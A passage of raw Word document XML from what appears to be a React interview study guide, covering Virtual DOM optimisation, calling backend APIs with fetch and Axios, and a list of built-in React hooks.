    <w:p w14:paraId="05625808" w14:textId="77777777" w:rsidR="008975B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51F8BF4">
          <v:rect id="_x0000_i3569" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D7CC8D"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8. Selective Event Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CF060D"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act ensures that only relevant events trigger updates to the Virtual DOM. By handling events in a controlled manner, React ensures that unnecessary state updates or renders don’t occur when the event doesn’t affect the component’s state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16280FD8"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How it reduces modifications</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: By managing events and ensuring that only events that modify the state or UI cause updates, React avoids making unnecessary changes to the Virtual DOM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F49355" w14:textId="77777777" w:rsidR="008975BE"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648DDDD">
          <v:rect id="_x0000_i3570" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C4F0C1"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Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5503E3"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Reducing modifications in the Virtual DOM is a key part of React's optimization strategy. By leveraging techniques like the </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>diffing algorithm</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>component-level updates</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>memoization</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>batched updates</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>controlled rendering</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, React ensures that only necessary changes are made to the Virtual DOM, resulting in faster rendering and better overall performance. These optimizations allow React to efficiently manage UI updates without overburdening the system with unnecessary re-renders.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A8B4A4" w14:textId="56B28C6B" w:rsidR="00955143" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00955143">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="1A374DDB">
          <v:rect id="_x0000_i3571" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D364658" w14:textId="4C5E2279" w:rsidR="00F9109D" w:rsidRPr="00CE4B95" w:rsidRDefault="001E56EC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="876" w:name="_Toc196308356"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>What do you call the backend API from ReactJS</w:t>
      </w:r>
      <w:r w:rsidR="00F9109D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="876"/>
    </w:p>
    <w:p w14:paraId="402C6668" w14:textId="1E59BDF3" w:rsidR="008975BE" w:rsidRPr="003C7C02" w:rsidRDefault="008975BE" w:rsidP="003C7C02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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In ReactJS, you can call the backend API using </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JavaScript's fetch API</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or a third-party library like </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Axios</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. These methods allow you to send HTTP requests to the backend server and receive responses that can be used to update the component's state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026177C8"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 Using fetch API (Native JavaScript)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703CD885"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he fetch API is built into modern browsers and is a simple way to make asynchronous HTTP requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694B4E3E"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ample of calling an API with fetch:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09058EE6"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 useEffect, useState } from 'react';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3547B006" w14:textId="77777777" w:rsidR="008975BE" w:rsidRPr="003C7C02" w:rsidRDefault="008975BE" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A389EF0"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function App() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09361EFA"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const [data, setData] = useState(null);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4F22BA" w14:textId="77777777" w:rsidR="008975BE" w:rsidRPr="003C7C02" w:rsidRDefault="008975BE" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02F42579"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useEffect(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4E35A6"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fetch('https://api.example.com/data')  // Replace with your API endpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326CFEF8"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hen(response =&gt; response.json())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7E3C99"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hen(data =&gt; setData(data))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E77E83"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catch(error =&gt; console.error('Error fetching data:', error));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06ED6BFE"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 []);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D54A140" w14:textId="77777777" w:rsidR="008975BE" w:rsidRPr="003C7C02" w:rsidRDefault="008975BE" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12BAF403"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return (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292FCFD0"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lt;div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A44254C"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lt;h1&gt;API Data:&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13579A12"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data ? &lt;pre&gt;{JSON.stringify(data, null, 2)}&lt;/pre&gt; : &lt;p&gt;Loading...&lt;/p&gt;}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BE66A1"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lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D73E9E7"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62E144B1"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77152B37" w14:textId="77777777" w:rsidR="008975BE" w:rsidRPr="003C7C02" w:rsidRDefault="008975BE" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0227D2EC"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default App;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD3579D"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Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D4FE7F"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fetch('https://api.example.com/data'): Sends a GET request to the provided API URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20344487"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hen(response =&gt; response.json()): Converts the response to a JavaScript object if it's in JSON format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1035A239"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hen(data =&gt; setData(data)): Updates the React component's state with the fetched data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749D1A81"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atch(error =&gt; console.error('Error:', error)): Catches any errors that occur during the fetch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0EB0BD"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2. Using Axios (Third-Party Library)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309F0F77"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Axios is a popular third-party library that provides a cleaner API for making HTTP requests and handling responses, especially for more complex scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612102AC"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First, you need to install Axios using npm or yarn:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A707466"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npm install axios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572E46D1"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or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255FB0FF"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yarn add axios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6315DDC8"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ample of calling an API with Axios:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EA35DE"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 useEffect, useState } from 'react';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C217B4A"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mport axios from 'axios';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B83801B" w14:textId="77777777" w:rsidR="008975BE" w:rsidRPr="003C7C02" w:rsidRDefault="008975BE" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ED64475"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function App() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0CFC45"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const [data, setData] = useState(null);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1636ACA6" w14:textId="77777777" w:rsidR="008975BE" w:rsidRPr="003C7C02" w:rsidRDefault="008975BE" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A8A1E04"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useEffect(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAE64C2"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axios.get('https://api.example.com/data')  // Replace with your API endpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505C3021"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then(response =&gt; setData(response.data))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAF5107"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catch(error =&gt; console.error('Error fetching data:', error));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC48117"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 []);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00991977" w14:textId="77777777" w:rsidR="008975BE" w:rsidRPr="003C7C02" w:rsidRDefault="008975BE" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C728FFF"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return (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220AF219"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lt;div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F65A80"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">      &lt;h1&gt;API Data:&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFA9F2E"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data ? &lt;pre&gt;{JSON.stringify(data, null, 2)}&lt;/pre&gt; : &lt;p&gt;Loading...&lt;/p&gt;}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B96C28"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lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7724C8"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2BCAD5DD"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1F7B4485" w14:textId="77777777" w:rsidR="008975BE" w:rsidRPr="003C7C02" w:rsidRDefault="008975BE" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="570075DC"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xport default App;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B66711"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Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9CD177"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axios.get('https://api.example.com/data'): Sends a GET request to the provided API URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1C975A"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hen(response =&gt; setData(response.data)): Updates the component's state with the response data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E7185D"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atch(error =&gt; console.error('Error:', error)): Catches and logs any errors that occur during the request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9E51E6" w14:textId="77777777" w:rsidR="008975BE" w:rsidRPr="003C7C02" w:rsidRDefault="008975BE"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When to Use fetch vs. Axios:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB89B2E"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fetch</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ideal for simple requests and if you want to avoid adding extra dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E25F725"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Axios</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Recommended when you need advanced features like automatic JSON handling, request/response interceptors, or handling of HTTP error codes in a more customizable way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11873291" w14:textId="77777777" w:rsidR="008975BE" w:rsidRPr="003C7C02" w:rsidRDefault="008975BE"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Both methods can be used in React to make backend API calls, but Axios offers more convenience and features out of the box.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D72E50" w14:textId="3EB93833" w:rsidR="00955143" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00955143">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="70EFE88C">
          <v:rect id="_x0000_i3572" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="19485425" w14:textId="43708CB6" w:rsidR="00F9109D" w:rsidRPr="00CE4B95" w:rsidRDefault="00932757">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="877" w:name="_Toc196308357"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are other Hooks in React</w:t>
      </w:r>
      <w:r w:rsidR="00F9109D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="877"/>
    </w:p>
    <w:p w14:paraId="34C7AF42" w14:textId="79D46E7D" w:rsidR="003C191F" w:rsidRPr="003C7C02" w:rsidRDefault="003C191F" w:rsidP="003C7C02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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act provides several built-in hooks that allow you to manage state, side effects, context, and more in functional components. Here’s a list of the most commonly used hooks in React:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9B34B7" w14:textId="77777777" w:rsidR="003C191F" w:rsidRPr="003C7C02" w:rsidRDefault="003C191F"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 useState</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C424418"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d to declare state variables in a functional component.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553B310C"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st [count, setCount] = useState(0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD57B84" w14:textId="77777777" w:rsidR="003C191F" w:rsidRPr="003C7C02" w:rsidRDefault="003C191F"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2. useEffect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF04ED8"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d for managing side effects in a functional component, such as fetching data, updating the DOM, or subscribing to events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000D90C9"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Effect(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23781A1B"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 Code to run on component mount or update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518E424B"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dependencyArray]);  // Runs when the dependencies change</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59921F78" w14:textId="77777777" w:rsidR="003C191F" w:rsidRPr="003C7C02" w:rsidRDefault="003C191F"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3. useContext</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CE31D5"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d to access the context values created by the createContext API in React. It allows you to share state across the component tree without having to pass props down manually.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625AA027"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st value = useContext(MyContext);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BEE7F6" w14:textId="77777777" w:rsidR="003C191F" w:rsidRPr="003C7C02" w:rsidRDefault="003C191F"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4. useReducer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD5A282"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A more advanced alternative to useState for managing state when it’s more complex, like handling multiple actions in one state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC81C69"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st [state, dispatch] = useReducer(reducerFunction, initialState);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F6B10D" w14:textId="77777777" w:rsidR="003C191F" w:rsidRPr="003C7C02" w:rsidRDefault="003C191F"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5. useCallback</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F30F73"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turns a memoized version of the callback function that only changes if one of the dependencies has changed. It's useful to prevent unnecessary re-renders of components that depend on callbacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A46C71"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st memoizedCallback = useCallback(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE117B2"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 Function logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0556F00B"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dependencies]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73438A85" w14:textId="77777777" w:rsidR="003C191F" w:rsidRPr="003C7C02" w:rsidRDefault="003C191F"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6. useMemo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0125F6D3"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turns a memoized value. It’s used to optimize performance by recomputing the value only when one of the dependencies changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287A9C59"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st memoizedValue = useMemo(() =&gt; computeExpensiveValue(a, b), [a, b]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CCD5CF" w14:textId="77777777" w:rsidR="003C191F" w:rsidRPr="003C7C02" w:rsidRDefault="003C191F"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7. useRef</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07330C27"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Returns a mutable ref object that persists for the lifetime of the component. It can be used to reference DOM elements or store mutable values that don’t cause re-renders when changed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C65FADD"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st myRef = useRef(null);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F55DC6E" w14:textId="77777777" w:rsidR="003C191F" w:rsidRPr="003C7C02" w:rsidRDefault="003C191F"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8. useLayoutEffect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF673B4"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Similar to useEffect, but it’s fired synchronously after all DOM mutations. It's useful when you need to measure or make adjustments to the DOM before the browser repaints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C19116"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lastRenderedPageBreak/>
        <w:t>useLayoutEffect(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E7EAE3"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 Code that interacts with the DOM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202ABD8A"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dependencies]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B61E04" w14:textId="77777777" w:rsidR="003C191F" w:rsidRPr="003C7C02" w:rsidRDefault="003C191F"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9. useImperativeHandle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAA52D9"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ustomizes the instance value that is exposed when using ref in a parent component. This allows you to control what properties or methods a child component exposes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04392F0B"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ImperativeHandle(ref, () =&gt; ({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CE752A"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focus: () =&gt; { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B71A0A1"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 Custom function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412C0832"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5143397C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B01234A" w14:textId="77777777" w:rsidR="003C191F" w:rsidRPr="003C7C02" w:rsidRDefault="003C191F"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0. useDebugValue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B38E2D"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d for debugging custom hooks. It lets you display a label in React DevTools for your custom hook.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246201FB"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DebugValue(value);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF2C569" w14:textId="77777777" w:rsidR="003C191F" w:rsidRPr="003C7C02" w:rsidRDefault="003C191F"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1. useTransition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228C3512"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d to mark certain updates as "transitions," which will allow React to keep the app responsive while processing expensive updates (useful for concurrent rendering).</w:t>
      </w:r>
    </w:p>
